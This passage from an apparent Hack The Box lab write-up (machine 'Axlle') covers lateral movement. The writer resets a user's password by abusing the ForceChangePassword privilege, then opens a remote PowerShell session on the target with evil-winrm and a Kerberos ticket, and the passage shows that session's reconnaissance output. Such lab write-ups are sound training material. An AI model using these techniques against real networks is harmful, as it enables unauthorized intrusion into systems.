jacob.greeny


In the earlier stage, I was able to reset the password of the jacob.greeny user by leveraging the ForceChangePassword privilege as the dallon.matrix user. It was then validated. The jacob.greeny user is part of the Remote Management Users group.

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=jacob.greeny@mainframe.axlle.htb.ccache evil-winrm -i mainframe.axlle.htb -r AXLLE.HTB
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
 
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> whoami
axlle\jacob.greeny
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> hostname
MAINFRAME
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::133
   IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
   Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

Lateral Movement made to the target system as the jacob.greeny user via evil-winrm